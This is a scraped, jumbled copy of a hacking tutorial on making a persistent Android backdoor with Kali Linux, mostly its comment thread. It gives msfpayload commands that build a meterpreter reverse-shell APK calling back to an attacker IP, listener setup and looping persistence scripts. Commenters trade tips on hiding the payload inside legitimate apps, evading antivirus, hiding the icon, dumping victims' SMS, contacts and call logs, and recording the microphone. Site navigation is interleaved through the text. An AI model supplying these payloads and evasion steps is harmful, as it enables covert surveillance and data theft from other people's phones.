This guide, right here will explain everything.
Local IP Address: "Your Internal Kali IP (ifconfig)"

Start Port: 4444
End Port: 4444
 REPLY
ASHWIN DEVRAJ
i have did eevry thing u said but after opening the file i have sent to device and opened and the it says prasing error (there is problem in prasing the packages) need
urgent hepl
 REPLY
F.E.A.R.
Right here
 REPLY
JESSICA THOMSON
F.E.A.R thank you for such great tuts :)

i have couple of questions.. i hope u dont mind answering :)
i have done the easy work like creating and signing the apk.
and than i tested it over WAN and it did work fine. problems i faced are, first 3 or 4 time session is closed in less than a minute and on next try it doesn't closed and i
had enough time to experiment with commands. can u tell why this happened at start it doesn't show commands like dump sms and other commands ? why does this
happen?_
can we start keylogging in meterpreter shell ?

can we migrate or bind our meterpreter process/ session to another process ?
when i record mic, it just record 1 or 2 sec audio even when i typed recordmic 1000 ? can u tell how can record audio for longer duration?
i can not dump my sms and contacts( their was an error dont know why) but i was able to dump my call log.
sorry for lots of questions and excuse my english
 REPLY
F.E.A.R.
Welcome Jessica,
Android Meterpreter is still in development. (It is quite unstable)
After the meterpreter session starts, the commands (dump_sms etc.) can be used and can be displayed using help command. Anti-Virus is the only reason for this to
happen. (Specially pre-installed ones, like in Mi or Samsung) If you can somehow make the AV to 'fully trust' the application 'Main Activity' then these problems do not
occur (Tested in Mi)
No, we cannot either perform Key-logging or Migrate to other processes, these Post-Modules are for Windows.
However you can use scripts to key-log from the stock android keyboard and for migration purposes (may need root access)
Recording, (record_mic 20) is not an issue for me, try this again without signing the application. (Use it Raw)
Answer to the last question is same as the first one, I use only the raw .apk and there is no problem executing the commands.
Run this command and tell the result in your reply please: check_root
 REPLY
JESSICA THOMSON
Thank you F.E.A.R. Appreciate you replied fast :))
without signing the apk it can not be installed. i tried it

my test phone is root, i rooted it my self and i checked it with same command.
how do i make AV to trust my apk? can you direct me to such tut or guide ?
record mic stil doesn't work for me. :((
i am only able to dump call log but i can not dump my sms and contacts... i think some kind of timeout, may b i have lots of texts in my inbox and lots of contacts..
iam not sure :?
Thnx again FEAR
 REPLY
F.E.A.R.
Jessica:
You can either make it to 'trust' or disable it's real time protection from settings.
For example in CM security AV application, when I disable the 'Real Time Protection' option, it' doesn't scan the malicious .apk and hence the permissions to access
microphone or camera are by default set to grant, however if the option is enabled, the AV scans the permissions of the App and resents them to Prompt or Deny.
If while dumping sms and contacts there is a time-out error then it is because of the faulty/slow connection and not any internal errors. The dumping process may take
even 20 minutes (as in my case).
Try deleting all the useless ones (spam) and then dump again. (Just for the test)
 REPLY
ZI LSD
If the Android device is not ROOT there is another solution.

When the device is put in charge or boot, the backdoor restarts.
for that you have to modify the source of the original apk with Android Studio.
jpeg
explanation here
 REPLY
F.E.A.R.
Thank You ZI,
But actually there are many other ways to achieve this, I came to know, 3 days after publishing the guide. (Never thought of updating the guide)
 REPLY
ADARSH SINGH
Hey Fear I have backdoored the Main activity apk with the original hike apk and the backdoored works great but i want persistant , and i tried your script but it gives
me this error when i execute the script from the shell.
meterpreter > shell

Process 3 created.
Channel 4 created.
cd /storage/sdcard0/download
ls
agent.apk
anything.sh
sh anything.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }Error type 3
(I am using this version of script below and when i install only the MainActivity.apk on my android(jelly bean) phone the script works.but when i installed the
backdoored apk the script dosen't work and gives me the error shown above. )
(this is the script i am using i think i need to modify something in this script to work it out)
#!/bin/bash
while :
sleep 20
done
Do i need to modify the script to work because i have embeded it into an another apk.Help would be really appriciated.
 
F.E.A.R.
Ooh I see, nice!

If you did it with Hike, just modify this line-"com.metasploit.stage/.MainActivity".
For Hike it might be something like this: com.google......../."..."
Since I don't use Hike, you can check the correct location by navigating to /sdcard/Android/Data/ for "com.google......."
And the /."..." is used to execute the application, so decompile the app (hike) and extract the name of the program, it should be in the .xml file.
Also this would make the application (hike) with the malicious app open,
but I am sure you will find a way out ;)
 REPLY
ADARSH SINGH
Yup! I will try it out today.Hope this works for me:)
 REPLY
ADARSH SINGH
Hey Fear as you said i tried to modified the script but it is not working for me or else i am doing it wrong.I am providing you with the android manifest.xml .Here is
the androidmanifest.xml
http://www.mediafire.com/view/0jbw13nh4di2ani/AndroidManifest.xml.txt
You told me to navigate to /sdcard/Android/Data/ for "com.google......." and here is the output of that
http://www.mediafire.com/view/4j4t2kq6oqwd7ea/output.txt
So please tell me what changes should i make in "com.metasploit.stage/.MainActivity" to make the script working please i really appreciate if you help me out of this.
 REPLY
MM A
1 WEEK AGO 1  
come on man i have the same problem if the app opens with the exploit he/she will uninstall it :((((( what should we do ??
 REPLY
DARK BLOGGER
how do you do that? can you sent me a copy of your eclipse project?
i have found a way to make it fud by change name in package com.metasploit.stage to com.yourname.stage and also in the java files import package
com.yourname.stage
but i cant make it persistannce because i need to register a receiver and also after i need to bind it with another legitime app
 REPLY
CV NIKHIL
is internet is required?
 REPLY
CB
Hi F.E.A.R thanks you for guide. I have a problem to access in /sdcard and also in principally system folder. The error is: stdapifschdir: Operation failed: 1. Can you help
me? Test Phone: S3 and S5
I saw that when I install the apk not asking for access permission to sdcard...
 REPLY
ZI LSD
Now, I look to hide the icon and task

The apk crash with this code in MainActivity
PackageManager p = getPackageManager();
ComponentName componentName = new ComponentName(this, com.apps.MainActivity.class);
p.setComponentEnabledSetting(componentName,PackageManager.COMPONENTENABLEDSTATEDISABLED, PackageManager.DONTKILLAPP);
I look for a solution
 REPLY
ZI LSD
I Found!
Mod backdoor for persistent and hide ico. No rooted devices >>
HERE : HT1.txt
 REPLY
HASOC
Hi, Do you have a recompiled version of your mod? Would like to try it.
Or can you plz elaborate how to implement and recompile android payload with your mod (HT1.txt)?
Cheers in advance!
 REPLY
ECLIPSE
Hi, it said the apk is virus when i send it and installed it. the guy had some software cm security or something like it and it said of main activity a dangerous program
and it was killed by the anti virus. now how to make save it from the anti virus? ideas? thanks yes it is a great post xD
 REPLY
F.E.A.R.
Yes I know, already tried with all the best Anti-Viruses.
Here's a solution to all the AV's!
 REPLY
VISHAL RAGHAV
hey F.E.A.R. you are doing some grt work here and your tutorial made me so much interested in hacking. a big thanks to u...
and i want to ask u how to port forward on my router...
model number - Tp link w8968v4 i hv tried every guide on the internet but i am unable to get it to work. and can you tell me if there is any way to keylog the hacked
but "not rooted" device.
 REPLY
DARK BLOGGER
i have the source code of msf payload how i add a receiver?for example bootcomplete or alarm ? because your persistance scipt it works but generates sessions every
20 seconds.
i have found how to make it seems like a legitime app and bypass antivirus but my problem is i need help with android receivers
 REPLY
SANDEEP YADAV
well work bro
i have a problem when im install the backdoor in the android im getting an error (THERE WAS A PROBLEM WHILE PARSING THE PACKAGE )
PLEASE TELL ME WHAT IT AND HOW TO FIX IT
 REPLY
BIRAT BOSE
Hellooo !! can anybody help me about removing the payload android apk from the victim's phone?? plzzz help!!
 REPLY
HAMMAD RAHMAN
Hi there F.E.A.R
GREAT tutorial!!
I got WAN working and everything
But, my phone is rooted, and when i drop into shell and su, it shows superuser prompt on screen to get access for MainActivity.
therefore, wont the victim see this and decline it? It is meant to be discreet, no?
Help please, thanks much!!
 REPLY
MOJTABA GHANIDEL
I have singed and aligned the payload..but it does not install on Huawei phones!!
while makeing the payload..I got no errors.
 REPLY
SIMON TADROS
any solution for lolipop ?
 REPLY
AB'S CHOUDHARY
use msfvenom instead of msfpayload
 REPLY
MOJTABA GHANIDEL
script is not working..

I tried on LAN and WAN.
my android is 5.0.2 and didn't copy and paste the script..I typed it.
but the "upload command" didn't work for me so I uploaded the script using USB cable to my device ( /sd/download) and after shell command and executing the script,
I exited the listener and made a new one..but no session activated.
 REPLY
MOJTABA GHANIDEL
does matter if we use port 4444 or 443?
 REPLY
MOJTABA GHANIDEL
Any answers???
 REPLY
UGLY LAD
can any body help me ? i get a meterpreter connection and then i upload anything.sh however when i execute anything.sh via shell the script runs but says
com.metasploit.stage/.MainActivity not found
F.E.A.R Ocuupy the web can any of u guys help me plz
 REPLY
ROSE
Hi
 REPLY
ROSE
Hi there, I have question. If I install Kali on VM machine, which IP will be public and which will be private (Internal).
As I got an issue while session (meterpreter) and I think this will solve the issue.
Thanks
 REPLY
UGLY LAD
type if config in VM kali to get your internal ip and googly m ip to get your public ip
 REPLY
  
1
FOLLOW US
ROSE  
1 YEAR AGO
Thanks dear I am trying now
 REPLY
ROSE
Still not working, I got stack after typing exploit
Nothing appear
 REPLY
ROSE
exploit completed, but no session was created
Also, Android device, .apk file I got that the app. already installed coz I install it before, how I can remove maybe this cause issue
 REPLY
ROSE
please assist me
 REPLY
ROSE
No body can assist me??
 REPLY
ROSE
No response>>
 REPLY
MOJTABA GHANIDEL
if u r using a VM machine, u need to go to network setting of ur machine and set on on bridge.

if u do this ur machine and AP get a same IP then meterpreter session will work
 REPLY
ROSE
Hi, thanks dear. Your answer is make a sense and I will try it now.
 REPLY
MATHIS GAXBOY
i have the same problem i dont get a session
 REPLY
MOJTABA GHANIDEL
on LAN or WAN?
if ur trying on LAN and dont get meterpreter session, there must be problems with ur listener port or payload file..
if ur trying on WAN then u should check ur port forwarding. also u need to check if there is any problems while making the payloadfile.apk
 REPLY
NIMA AMINI
Hey guys
I backdoored th payload into HotSpot and change the anything.sh to this:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.Main -n com.anchorfree.ui/.ViewHome
sleep 600
done
but when I run the "sh anything.sh" it gives me this error:
Error type 3
Error: Activity class {com.anchorfree.ui/com.anchorfree.ui.ViewHome} does not exist. FOLLOW US   
I do everything exactly as you said. Would you please say what should I do?
 REPLY
MOJTABA GHANIDEL
use this code
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.Main -n package name/activity address
sleep 600
done
 REPLY
GIREESH PAI
APK size is 0 bytes :(
 REPLY
SAHIL HARIDAS
Thanks for the great post F.E.A.R. but I cant seem to be able to change the directory to init.d
When I listed all the files it wasn't found. Is there an alternate folder is it possible that the startup folder has changed on my Huawei P8???
 REPLY
JONE DEEP
how to bypass the AV????
 REPLY
FRANCK KOUASSI
1 YEAR AGO -1 HIDDEN
ABHISHEK SEVARIK
thanks fear
but when i execute sh anything.sh it says syntax error while is unmatched what should i do
please reply me as soon as possible
 REPLY
KALYAN VISWANATH
Hi FEAR
Am getting this error
Please help
 REPLY
HUSSAM FELIMBO
Great tutorial, looking forwarding to trying it later tonight!
Just a quick question about a line of code:

do am start
WONDERHOWTO --user
GADGET HACKS 0 NEXT
-a android.intent.action.MAIN
REALITY NULL BYTE -n com.metasploit.stage/.MainActivity
Will I have to change ".MainActivity" if I changed the appname in <string name="appname">MainActivity</string> when decompiling the malicious apk according to
this? FOLLOW US  
Keep up the wonderful work!
Thanks!
 REPLY
WALEED AFZAL
gud job F.E.A.R (y)
 REPLY
WALEED AFZAL
F.E.A.R i have a problem my meterpreter is not open i don't know why when i enter the command exploit it try to start but can't start u tell me what's the problem i try
this from 1 week
 REPLY
SAGAR BALYAN
This backdoor doesn't work for me at all ! I have uploaded the backdoor on victim's phone but it doesn't bring the session back once it has died.
Please Help !
 REPLY
DRMTR FDFFS
Exploit Works !
You need to start exploit with this command:
ExitOnSession false
exploit -j
and Metasploit will keep session from dead.
 REPLY
MOJTABA GHANIDEL
guys i need a little help

i have embed payload.apk into original APK file, and is working well
but i want to use the script. how should i change the perimeters of the script?
 REPLY
NICOLÁS ALEJANDRO MARTÍNEZ

this is only for rooted cellphones? I can't find the init.d folder, where i have to upload the .sh ?
 REPLY
BARROW
Did you read the first part of the guide here?
 REPLY
ALEX ALEX
I can't open the sdcard after the session opens. What should I do?
 REPLY
GANESH VARMA
1 YEAR AGO - EDITED 1 YEAR AGO
FOLLOW US
1   
hi great tutorial,i was able to get meterpreter session over my local network but can't make it work over internet(WAN).Unfortunately i have a router (DIGISOL-HR1400)
which has port triggeringinstead of port forwarding and i have heard that it is similar to port forwarding. I've tried a number of ways to set up port triggering but it just
doesn't work. So any kind of help on how to set up port triggering is really appereciated!! :)
 REPLY
>_E.X.P.L.O.I.T
Why does it keep saying ...'while' unmatched ?
 REPLY
FUNKY FUNKYDREAM
Hi F.E.A.R
thanks for this tuto ;)
for my phone the reversetcp exploit works but not the remaining of the tuto ... :(
It seems that you need a rooted device to get success right ?
I can't enter /etc/init.d or /system/etc/init.d (/etc is ok ...)
* Started reverse TCP handler on 192.168.0.16:443

* Starting the payload handler...
* Sending stage (63194 bytes) to 192.168.0.15
* Meterpreter session 9 opened (192.168.0.16:443 -> 192.168.0.15:36014) at 2016-11-13 09:42:42 -0500
meterpreter > pwd

/data/data/com.metasploit.stage/files
meterpreter > cd /
meterpreter > pwd
/
meterpreter > cd /etc/init.d
stdapifschdir: Operation failed: 1
then afteruploading my getroot.sh script, it doesn't execute properly :
sh getroot.sh
Starting: Intent { act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity }
Error type 3
Do you have any clue for me ?
I'm using a Samsung Galaxy Grand Prime (Android 5.1.1 / Kernel 3.14.27-1070395)
Any help would be appreciated ...
Best
FunkyDream
 REPLY
SIVA ADITHYA
First this is a great tutorial.. but i need help when i exicuited this script i got error as Error: Bad component name: com.metasploit.stage/
what should i do pls hlp me
 REPLY
TAREK ABD-ALLAH FARRAG

can anybody tell me how to modify the .sh file to match with embed payload in another original apk, how should i change the perimeters of the script?
 REPLY
PAPANIREAL
yea, i also need a bit of help at this point.

any help would be apreciated.
 REPLY
DHARMI STEPH
Thank you for your great tutorial F.E.A.R but I'm having a problem running the script in shell...
I'm getting
Error type 3
Error: Activity class {com.metasploit. stage/com.metsaploit.stage.MainActivity} does not exist.
Here is a screenshot below
Any help will be appreciated.....

Thanks a lot
BTW...I'm using a rooted Samsung galaxy note 3 running android 5.0 stock rom
 REPLY
AKANSHA SINGH
I've embedded it in hike apk. The error comes that the com.metasploit.stage.MainActivity doesnot exists. How to fix this?
 REPLY
IRRESISTIBLE GUY
Please Help me for Port forwarding i am in desparate need to exploit an android on other another network.
Please Somebody help me.
 REPLY
GHADEER ALALI
Anyone knows the list for all cmds available to execute on victims phone?
for e.g. delete media.
 REPLY
SARTORY NONAME
Hi F.E.A.R.,
thanks for the tutorial.
It's all working except for the last and crutial step:
after
 sh anything.sh
I get the error message
 Starting: Intent { act=android.intent.action.MAIN cat=android.intent.category.LAUNCHER pkg=–-user }
java.lang.SecurityException: Permission Denial: startActivity asks to run as user -2 but is calling from user 0; this requires
android.permission.INTERACTACROSSUSERS_FULL
at android.os.Parcel.readException(Parcel.java:1686)
at android.os.Parcel.readException(Parcel.java:1639)
at android.app.ActivityManagerProxy.startActivityAsUser(ActivityManagerNative.java:3119)
at com.android.commands.am.Am.runStart(Am.java:635)
at com.android.commands.am.Am.onRun(Am.java:388)
at com.android.internal.os.BaseCommand.run(BaseCommand.java:51)
at com.android.commands.am.Am.main(Am.java:121)
at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:262)
Somebody facing the same problem?

Any tips?
Sartory
 REPLY
SARTORY NONAME
Found a solution:
On Android 6.0 you have to use the following script:
 #!/bin/bash
# upload to etc/init.d/, so that it is persistent even afterReboot!
while :
do am startservice --user 0 com.metasploit.stage/.MainService
sleep 60
done
¯\(?)/¯ Sartory
 
TAHA TEMURI
Meterpreter session not receiving when I ran payload my IP address is dynamic so could it be reason for not receiving the payload,I used the following.
For payload
msfpayload android/meterpreter/reverse_tcp LHOST=MYEXTERNALIPHERE R > /root/abcde.apk
Then for Listener
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST MYPRIVATEIP
exploit
 REPLY
MAT PON
hi to all, i am just enrolled here.
i learned that is possible to make backdoor persistent by enable apk starting on phone boot / startup. there are plenty of material about.
2) to prevent antivirus to block installation i think we properly need to sign the apk
3) thanks
 REPLY
ABDUL MANAN
hey
i just wanted to say i did as you said but whenever i try to reconnect or say reboot it just don't connect and giver error and while on victims end it says unfortunately
mainactivity stopped working any suggestions ?
 REPLY
HACK3RSP0T .
if u are facing any problem follow this video tutorial.Thanks me later :)
 REPLY
PRUDHVI GALI
root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=124.123.69.237 R > /root/Upgrader.apk
bash: msfpayload: command not found
PLS help me with this... I would be grateful
 REPLY
CONNER DASSEN
LAST MONTH 1  
The screen needs to be turned on for this to work.
I had the handler listening for 2 minutes and nothing happened, but when I turned on the screen it instantly connected. And it keeps losing the connection, often it says
"Session closed. Reason: died" within 2 minutes. FOLLOW US  
 REPLY
Share Your Thoughts
YOU
LOGIN TO COMMENT
Click to share your thoughts

How To Create A Persistent Back Door in Android Using Kali Linux - Null Byte - WonderHowTo

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

How To Create A Persistent Back Door in Android Using Kali Linux - Null Byte - WonderHowTo

Загружено:

Авторское право:

Доступные форматы

12/5/2017 How to Create a Persistent Back Door in Android Using Kali Linux: « Null Byte :: WonderHowTo

Create a Persistent Back Door in Android Using Kali Linux:

O R rather How to make the Backdoor Persistent:

Hello, my Cold and Merciless Hackers,

Fire Up Kali and Hack an Android System:

I'll be hacking on WAN, using a VM.

Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk

Now, lets set-up a Listener:

WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE

Create a Persistent Script: FOLLOW US   

Move/Copy this to the Home/Root folder of KALI.

Upload It to the Hacked Android System:

Check again by typing:

WONDERHOWTO GADGET HACKS NEXT REALITY NULL BYTE

Screen & Get Root (No Password Hacking

MAC FOR HACKERS

How to Get Your Mac Ready for Hacking

Get Anyone's Wi-Fi Password Without

Again change directory:

An Intro to Vim, the Unix Text Editor Every

Buy the Best Wireless Network Adapter for

Create an Evil Access Point with MitmAP

THE HACKS OF MR. ROBOT

How to Use the Shodan API with Python to

Time to Upload the Shell Script:

HACK LIKE A PRO

How to Crack Passwords, Part 1 (Principles

Discover Computers Vulnerable to

Hack Android Using Kali (Remotely)

Set Up a Headless Raspberry Pi Hacking

Verify Your Downloads Haven't Been

How to Crack Online Web Form Passwords

Capturing WPA Passwords by Targeting

How to Learn Binary Exploitation with

Hack Windows 7 (Become Admin)

4 Ways to Crack a Facebook Password &

MAC FOR HACKERS

Get Anyone's Wi-Fi Password Without Step 4

An Intro to Vim, the Unix Text Editor Every

How to Crack Weak Wi-Fi Passwords in

HACK LIKE A PRO

How to Crack Passwords, Part 1 (Principles

Discover Computers Vulnerable to

Hack Android Using Kali (Remotely)

Set Up a Headless Raspberry Pi Hacking Step 5

HOW TO HACK WI-FI

Capturing WPA Passwords by Targeting

Top 20 Hacker Holiday Gifts for Christmas

Install Kali Live on a USB Drive (With

4 Ways to Crack a Facebook Password &

MAC FOR HACKERS

Get Anyone's Wi-Fi Password Without

Keep Coming For More!

An Intro to Vim, the Unix Text Editor Every

Buy the Best Wireless Network Adapter for

Create an Evil Access Point with MitmAP

HOW TO HACK LIKE A PRO HOW TO HOW TO

VIDEO 200 Comments

HACK LIKE A PRO

Thank You! Ciuffy

Thank You! Sudharsan,

I'll try it too and update the script.

Yes, found out a problem, Updating the script...Now...